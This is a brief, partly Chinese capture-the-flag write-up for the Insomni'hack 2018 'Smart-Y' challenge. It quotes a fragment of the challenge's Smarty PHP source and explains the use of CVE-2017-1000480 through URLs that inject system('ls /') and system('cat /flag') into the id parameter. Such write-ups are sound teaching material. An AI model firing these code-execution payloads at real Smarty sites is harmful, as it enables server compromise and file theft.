Insomni'hackteaser2018-Smart-Y-writeup

Insomni’hack teaser 2018-Smart-Y-writeup

CVE-2017-1000480-Smarty-3-1-32-php代码执行-漏洞

题目

Last year, a nerd destroyed the system of Robot City by using some evident flaws. It seems that the system has changed and is not as evident to break now.

http://smart-y.teaser.insomnihack.ch

Solution

题目给了 源码 :

".htmlspecialchars("<<>>")."";
	   $source = $template;
	   $mtime = time();
   }
}

// Smarty configuration
$smarty = new Smarty();
$my_security_policy = new Smarty_Security($smarty);
$my_security_policy->php_functiOns= null;
$my_security_policy->php_handling = Smarty::PHP_REMOVE;
$my_security_policy->modifiers = array();
$smarty->enableSecurity($my_security_policy);
$smarty->setCacheDir(SMARTY_CACHE_DIR);
$smarty->setCompileDir(SMARTY_COMPILE_DIR);


$smarty->registerResource('news',new news);
$smarty->display('news:'.(isset($_GET['id']) ? $_GET['id'] : ''));

由源码的简洁性，推测是smarty框架的漏洞。通过扫目录可以发现存在smarty目录

查看change-log，得出smarty版本为3.1.31

利用 CVE-2017-1000480-Smarty-3-1-32-php代码执行-漏洞 。

http://smart-y.teaser.insomnihack.ch/console.php?id=*/system('ls /');//

http://smart-y.teaser.insomnihack.ch/console.php?id=*/system('cat /flag');//

flag:

INS{why_being_so_smart-y}

以上所述就是小编给大家介绍的《Insomni&＃x27;hack teaser 2018-Smart-Y-writeup》，希望对大家有所帮助，如果大家有任何疑问请给我留言，小编会及时回复大家的。在此也非常感谢大家对 我们 的支持！